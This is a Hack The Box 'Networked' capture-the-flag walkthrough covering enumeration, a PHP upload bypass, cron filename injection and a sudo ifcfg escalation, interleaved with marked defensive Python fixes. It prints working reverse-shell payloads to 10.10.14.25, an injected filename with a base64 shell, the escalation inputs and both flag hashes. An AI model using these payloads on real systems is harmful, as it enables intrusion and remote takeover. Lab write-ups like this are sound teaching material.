
HTB Networked done

Networked

OS:

Linux

Technology:

IP Address:

10.10.10.146

Open ports:

22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
443/tcp closed https

Users and pass:

Nmap

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.10.146_nmap 10.10.10.146 ; cat 10.10.10.146_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-19 23:52 UTC
Nmap scan report for 10.10.10.146
Host is up (0.035s latency).
Not shown: 65379 filtered tcp ports (no-response), 153 filtered tcp ports (host-prohibited)
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https

Ffuf: http://10.10.10.146

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ ffuf -u http://10.10.10.146/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o IP_ffuz -of all -e .php,.html,.txt,.bac,.backup

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.146/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Extensions       : .php .html .txt .bac .backup 
 :: Output file      : IP_ffuz.{json,ejson,html,md,csv,ecsv}
 :: File format      : all
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

backup                  [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 37ms]
[INFO] Adding a new job to the queue: http://10.10.10.146/backup/FUZZ

index.php               [Status: 200, Size: 229, Words: 33, Lines: 9, Duration: 35ms]
lib.php                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 37ms]
photos.php              [Status: 200, Size: 1302, Words: 68, Lines: 23, Duration: 40ms]
upload.php              [Status: 200, Size: 169, Words: 11, Lines: 6, Duration: 37ms]
uploads                 [Status: 301, Size: 236, Words: 14, Lines: 8, Duration: 48ms]
[INFO] Adding a new job to the queue: http://10.10.10.146/uploads/FUZZ

[INFO] Starting queued job on target: http://10.10.10.146/backup/FUZZ

[INFO] Starting queued job on target: http://10.10.10.146/uploads/FUZZ

index.html              [Status: 200, Size: 2, Words: 1, Lines: 2, Duration: 35ms]
:: Progress: [122814/122814] :: Job [3/3] :: 1058 req/sec :: Duration: [0:02:00] :: Errors: 0 ::

Open website: http://10.10.10.146

http://10.10.10.146/
---
 Hello mate, we're building the new FaceMash!
Help by funding us and be the new Tyler&Cameron!
Join us at the pool party this Sat to get a glimpse

Read source code: http://10.10.10.146

view-source:http://10.10.10.146/
---
<html>
<body>
Hello mate, we're building the new FaceMash!</br>
Help by funding us and be the new Tyler&Cameron!</br>
Join us at the pool party this Sat to get a glimpse
<!-- upload and gallery not yet linked -->
</body>
</html>

Unpack file: backup.tar

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ wget http://10.10.10.146/backup/backup.tar
--2024-08-20 09:16:26--  http://10.10.10.146/backup/backup.tar
Connecting to 10.10.10.146:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10240 (10K) [application/x-tar]
Saving to: ‘backup.tar’

backup.tar                    100%[==============================================>]  10.00K  --.-KB/s    in 0s      

2024-08-20 09:16:26 (889 MB/s) - ‘backup.tar’ saved [10240/10240]


┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ mkdir backup                              

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ tar -xf backup.tar -C backup              

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ cd backup 

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Networked/backup]
└─$ ls
index.php  lib.php  photos.php  upload.php

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Networked/backup]

Read file: upload.php

I see that I have to upload a small file, less than 60000 bytes.
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Networked/backup]
└─$ cat upload.php
<?php
require '/var/www/html/lib.php';

define("UPLOAD_DIR", "/var/www/html/uploads/");

if( isset($_POST['submit']) ) {
  if (!empty($_FILES["myFile"])) {
    $myFile = $_FILES["myFile"];

    if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
      echo '<pre>Invalid image file.</pre>';
      displayform();
    }

    if ($myFile["error"] !== UPLOAD_ERR_OK) {
        echo "<p>An error occurred.</p>";
        displayform();
        exit;
    }

    //$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];
    list ($foo,$ext) = getnameUpload($myFile["name"]);
    $validext = array('.jpg', '.png', '.gif', '.jpeg');
    $valid = false;
    foreach ($validext as $vext) {
      if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
        $valid = true;
      }
    }

    if (!($valid)) {
      echo "<p>Invalid image file</p>";
      displayform();
      exit;
    }
    $name = str_replace('.','_',$_SERVER['REMOTE_ADDR']).'.'.$ext;

    $success = move_uploaded_file($myFile["tmp_name"], UPLOAD_DIR . $name);
    if (!$success) {
        echo "<p>Unable to save file.</p>";
        exit;
    }
    echo "<p>file uploaded, refresh gallery</p>";

    // set proper permissions on the new file
    chmod(UPLOAD_DIR . $name, 0644);
  }
} else {
  displayform();
}
?>
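The extension loop above compares only the tail of the uploaded name, so a double extension such as file.php.jpg passes, and the page shows that the resulting file was then executed by the server. Added example, not code from the page: a Python model of that weak check beside a hardened one that allows a single extension, verifies the file header against it, rejects embedded PHP tags and assigns a server-chosen name. The magic-byte table and the sample bytes are constructed here; check_file_type from lib.php is not shown on the page and is not modelled.

```python
import os
import re
import secrets

# Magic bytes for the image types upload.php allows. Constructed table;
# lib.php's check_file_type is not shown on the page and is not modelled.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

def weak_extension_check(filename):
    """Mirrors the loop in upload.php: accept when the name *ends with* an
    allowed extension. 'file.php.jpg' passes because only the tail is compared."""
    return any(filename.endswith(ext) for ext in (".jpg", ".png", ".gif", ".jpeg"))

def hardened_check(filename, data, max_size=60000):
    """Return a server-chosen filename if the upload is acceptable, else None.
    Requires exactly one extension from the allowlist, a matching file header,
    no embedded PHP tags, and the size limit upload.php already enforces."""
    if len(data) >= max_size:
        return None
    parts = os.path.basename(filename).split(".")
    if len(parts) != 2 or not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", parts[0]):
        return None  # rejects double extensions such as file.php.jpg
    ext = parts[1].lower()
    if ext not in MAGIC or not data.startswith(MAGIC[ext]):
        return None  # extension must agree with the file header
    if b"<?php" in data or b"<?=" in data:
        return None  # image/PHP polyglot, the trick used in the Burp request
    return f"{secrets.token_hex(8)}.{ext}"  # never reuse the client's name

def demo():
    """Constructed inputs: a minimal JFIF header, and the same header with PHP appended."""
    jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 32
    polyglot = jpeg + b"<?php exec('id'); ?>"
    return {
        "weak_accepts_double_ext": weak_extension_check("file.php.jpg"),
        "hardened_double_ext": hardened_check("file.php.jpg", jpeg),
        "hardened_polyglot": hardened_check("photo.jpg", polyglot),
        "hardened_clean_ok": hardened_check("photo.jpg", jpeg) is not None,
    }
```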

Upload file

Sent request to remote host - Burp

I added the following payload to a *.jpg file:
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.25/80 0>&1'");
?>
and changed the file name to: file.php.jpg
---
Request - Burp
___
POST /upload.php HTTP/1.1
Host: 10.10.10.146
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------226325157714368244483425860449
Content-Length: 1939
Origin: http://10.10.10.146
Connection: keep-alive
Referer: http://10.10.10.146/upload.php
Upgrade-Insecure-Requests: 1

-----------------------------226325157714368244483425860449
Content-Disposition: form-data; name="myFile"; filename="file3.php.jpg"
Content-Type: image/jpeg

ÿØÿàJFIFHHÿÛCÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÛCÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÀê9"ÿÄÿÄ$!1AQqa‘±¡ÁðÿÄÿÄÿÚ?Êâ/ Š‚
`C ³S0çnµêcA©>3V¨1eÔ]<ò¼~VÏ1¸©†ÔÞx6f2€ÖšŠ
A™q­ß ¤òoð‡·|§@Ö¦ü³¸h/§‹VÞuÀ'ª]Ô·S;fߔ³Cü^¿b2¿¤Å@
¦¥a¨
“½¦þ?ià¶|0Ò`¢Í\óK q?5>‘`-õpœYß%•3æb/Ò٘"ÉØ'CÛ[ϚªæÜôߥ0ȼ%›Ò(9âãVk2åV_”ÏÜ=¿ýPZ¶lg™Å<vø–rº·H^LùòtðDQ5•Q¬¨%E¨›1žÓì¹àUãåq…Ü€¶ÿŒâƤ€Ì-·†½±xŠŒÉ~¿Öº@ÄÍPtí–6ŠÝ›ç¦^×qf!m¿@½ÃÝ'„—ø˜
nøg 2¢ÿê/}$jtŠÍkoL҂ˆÔôðeérA ÑDÄPc>«gK«y=¿+}_ÅÙ´\@4œ°’ùn%¼¢¦'Ú³ƒs,c•œí1®/ásì8Bˆ»©ÒÉäèUœ–_ƒà[ÍPC¶“4    ùtfI>ÍT]DPA   tdOw=y„ôà4ÊÛ#2‚›‹g¬ûc<Ãh7²3îdÛà‹@ÍU3Êúgz¼EÔS#9<4t#궦Š4Òã*7Ä5T$ß*²È¨Š€*Ò$¾?'æ(¬ú­:çú æ±lʖՆ(&( ‚³îøŽ#@_r[h/¸·ÕøOwàØm©ÊÔQªÏÛLÔ ª MDO5UPòKâ‡`Ò+«;gIt€&(¸áÄí›A®#>÷ˆ¶ÐH&¢’üµú¿Âz~kYȸ¬€Ñ©)y¨5ªÎ* LÁ¤gj]½‚ÛâR-ERBÙY¾¯„¶Ð@QFæøfMtü@?ê¥Ù8ðÇ¿ð"|ˆ«Á“à‰ %â‹Ø©Ÿêª(@¤U0ûM‘Ð[~TVI|‚ÏøÞÉ5Œ¾9.ñÀ­êdøOWLmù º¬˜‚¦,2€¨4ËP@€B߄·P@@@ÔPkSÜc(­Û>|3À¸¢ã65zNg–´ÖTj؀"€
"€¨¸Ó騠ŠXÐ âЊŠƒK€ÍB¬¸¡™6Ÿ’ÝDt™å•T[‰§ «À‹—áDU
ePE\€Êé` Š”_¨»€/f€¾"ë*
»ùdE:MQ¸—ðH³Žabás¡†+6"šº‹/H
ËLÕ@
q0@]A "¡¨*€ÍTA@0Ƅ«d@ꊋ/Ú   ¦ÓEVZÑU*J ¡ j2°¨ªˆ¢¢‚*¨¢4”n ¨FWö‚«¶Á-ej ª¨JŠ©ßÙØ
‹:Q<¬@E@X¸b‚³Bö¦¢‚éá<EP
(í"|€*?ÿÙ<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.25/80 0>&1'");
?>
-----------------------------226325157714368244483425860449
Content-Disposition: form-data; name="submit"

go!
-----------------------------226325157714368244483425860449--
---
Response - Burp
___
HTTP/1.1 200 OK
Date: Tue, 20 Aug 2024 10:41:26 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 37
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<p>file uploaded, refresh gallery</p>
---

Start netcat

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.146] 32836
bash: no job control in this shell
bash-4.2$ 

Open website: http://10.10.10.146/photos.php

Open the website to trigger the revshell
---
http://10.10.10.146/photos.php

Read file: /home/guly/check_attack.php

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.146] 32836
bash: no job control in this shell
bash-4.2$ script /dev/null -c /bin/bash
script /dev/null -c /bin/bash
bash-4.2$ 
bash-4.2$ find / -name "user.txt" 2>/dev/null
/home/guly/user.txt
bash-4.2$ cd /home/guly
bash-4.2$ ls -a
.   .bash_history  .bash_profile  check_attack.php  user.txt
..  .bash_logout   .bashrc    crontab.guly
bash-4.2$ 
bash-4.2$ cat crontab.guly
*/3 * * * * php /home/guly/check_attack.php
bash-4.2$ ls -la /home/guly/check_attack.php
-r--r--r--. 1 root root 782 Oct 30  2018 /home/guly/check_attack.php
bash-4.2$ cat /home/guly/check_attack.php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
    $msg='';
  if ($value == 'index.html') {
    continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>
bash-4.2$ 

Create a revshell - user guly

Analyse the file: /home/guly/check_attack.php

The cron job splices each upload's filename ($value) unquoted into a shell command, so I can control $value and put my own command (a revshell) in a file name:
---
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
---

Create a base64-encoded revshell

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ echo -n '/bin/bash -c "bash -i >& /dev/tcp/10.10.14.25/443 0>&1"' | base64
L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjI1LzQ0MyAwPiYxIg==

Create the revshell as a fake file name

bash-4.2$ cd /var/www/html/uploads
bash-4.2$ touch 'fake_file; echo L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjI1LzQ0MyAwPiYxIg== | base64 -d | bash'
bash-4.2$ 
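check_attack.php hands each upload's filename to exec() unquoted, which is what the fake_file name above exploits. Added example, not code from the page: Python showing how many shell words the crafted name turns into, the quoted and no-shell alternatives a maintainer should use instead, and a check that flags such names in an uploads listing. The listing and the PAYLOAD placeholder are constructed.

```python
import re
import shlex

UPLOAD_DIR = "/var/www/html/uploads/"

# Constructed directory listing standing in for scandir($path) in check_attack.php.
SAMPLE_LISTING = [
    "index.html",
    "10_10_14_25.php.jpg",
    "fake_file; echo PAYLOAD | base64 -d | bash",
]

# Allowlist for names the cron job is willing to touch: no spaces, no metacharacters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")

def vulnerable_command(value):
    """The string check_attack.php passes to exec(): the filename is spliced in
    unquoted, so shell metacharacters in it become part of the command line."""
    return f"nohup /bin/rm -f {UPLOAD_DIR}{value} > /dev/null 2>&1 &"

def quoted_command(value):
    """Same removal with the path quoted (what escapeshellarg() would give in PHP):
    the whole filename stays one shell word."""
    return f"/bin/rm -f {shlex.quote(UPLOAD_DIR + value)}"

def shell_words(command):
    """POSIX-style tokenisation, enough to show how many words the shell sees."""
    return shlex.split(command)

def safe_argv(value):
    """Preferred fix: validate, then remove without any shell (argv list, or
    PHP's unlink()). Refuses names outside the allowlist."""
    if not SAFE_NAME.fullmatch(value):
        raise ValueError(f"refusing suspicious filename: {value!r}")
    return ["/bin/rm", "-f", UPLOAD_DIR + value]

def suspicious_uploads(listing):
    """Detection: names in the uploads directory that fail the allowlist.
    Note the double-extension name is well-formed here; that is the upload
    filter's problem, not this one's."""
    return [n for n in listing if n != "index.html" and not SAFE_NAME.fullmatch(n)]
```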

Start netcat

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ netcat -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.146] 36224
bash: no job control in this shell
[guly@networked ~]$ id
id
uid=1000(guly) gid=1000(guly) groups=1000(guly)

Read flag: user.txt

[guly@networked ~]$ cd ~
cd ~
[guly@networked ~]$ ls -a
ls -a
.
..
.bash_history
.bash_logout
.bash_profile
.bashrc
check_attack.php
crontab.guly
user.txt
[guly@networked ~]$ type user.txt ; id ; ip a
type user.txt ; id ; ip a
bash: type: user.txt: not found
uid=1000(guly) gid=1000(guly) groups=1000(guly)
bash: ip: command not found
[guly@networked ~]$   

[guly@networked ~]$ cat user.txt ; id ; ipconfig
cat user.txt ; id ; ipconfig
88f49d25bb0edf1bd410cc6cd770c625
uid=1000(guly) gid=1000(guly) groups=1000(guly)
bash: ipconfig: command not found
[guly@networked ~]$ 

Privilege Escalation

sudo -l

[guly@networked ~]$ sudo -l
sudo -l
Matching Defaults entries for guly on networked:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User guly may run the following commands on networked:
    (root) NOPASSWD: /usr/local/sbin/changename.sh

Analyse the script

[guly@networked ~]$ ls -la /usr/local/sbin/changename.sh
ls -la /usr/local/sbin/changename.sh
-rwxr-xr-x 1 root root 422 Jul  8  2019 /usr/local/sbin/changename.sh
[guly@networked ~]$ 

[guly@networked ~]$ cat /usr/local/sbin/changename.sh
cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
    echo "interface $var:"
    read x
    while [[ ! $x =~ $regexp ]]; do
        echo "wrong input, try again"
        echo "interface $var:"
        read x
    done
    echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done

/sbin/ifup guly0

Privilege escalation via the script /usr/local/sbin/changename.sh (see the Redhat/CentOS network-scripts advisory under References)


[root@networked network-scripts]# sudo /usr/local/sbin/changename.sh
sudo /usr/local/sbin/changename.sh
interface NAME:
a id
a id
interface PROXY_METHOD:
b whoami
b whoami
interface BROWSER_ONLY:
c /bin/bash
c /bin/bash
interface BOOTPROTO:
d w        
d w
uid=0(root) gid=0(root) groups=0(root)
root
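The regex in changename.sh admits spaces, and the ifcfg file it writes is later sourced by the network scripts, so a second word in a value (a id) runs as a command; the session above shows exactly that. Added example, not code from the page: Python reproducing the script's pattern beside a tightened one, and a model of how bash reads the written line with and without quoting.

```python
import re
import shlex

# Same character class as changename.sh; the escaped space in the bracket is a literal space.
SCRIPT_REGEX = re.compile(r"^[a-zA-Z0-9_ /-]+$")
# Tightened pattern: no whitespace, so a value can never carry a second word.
STRICT_REGEX = re.compile(r"^[a-zA-Z0-9_-]+$")

def script_accepts(value):
    return SCRIPT_REGEX.fullmatch(value) is not None

def strict_accepts(value):
    return STRICT_REGEX.fullmatch(value) is not None

def ifcfg_line_unquoted(var, value):
    """What `echo $var=$x >> ifcfg-guly` writes: the value is not quoted."""
    return f"{var}={value}"

def ifcfg_line_quoted(var, value):
    """Fix on the writing side: single-quote the value so the whole line is
    one assignment when the file is sourced."""
    return f"{var}={shlex.quote(value)}"

def words_executed_when_sourced(line):
    """When network-scripts source ifcfg-guly, bash parses each line as a
    command. A leading VAR=word is an assignment prefix; every word after it
    is a command to run. Returns those trailing words (empty means harmless)."""
    words = shlex.split(line)
    return words[1:] if words and "=" in words[0] else words

def audit(var, value):
    """Summary for one answer to the script's prompts."""
    return {
        "script_accepts": script_accepts(value),
        "strict_accepts": strict_accepts(value),
        "runs_unquoted": words_executed_when_sourced(ifcfg_line_unquoted(var, value)),
        "runs_quoted": words_executed_when_sourced(ifcfg_line_quoted(var, value)),
    }
```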

Read flag: root.txt

[root@networked network-scripts]# cd /root
cd /root
[root@networked ~]# ls -a
ls -a
.   .bash_history  .bash_profile  .cshrc    .tcshrc
..  .bash_logout   .bashrc    root.txt  .viminfo
[root@networked ~]#    

[root@networked ~]# cat root.txt ; id ; ip a
cat root.txt ; id ; ip a
b1729771b539a3f8a9cb8bd1b10ffc51
uid=0(root) gid=0(root) groups=0(root)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:94:37:f2 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.146/24 brd 10.10.10.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:fe94:37f2/64 scope global mngtmpaddr dynamic 
       valid_lft 86398sec preferred_lft 14398sec
    inet6 fe80::250:56ff:fe94:37f2/64 scope link 
       valid_lft forever preferred_lft forever
[root@networked ~]# 

References

[Redhat/CentOS root through network-scripts](https://seclists.org/fulldisclosure/2019/Apr/24)
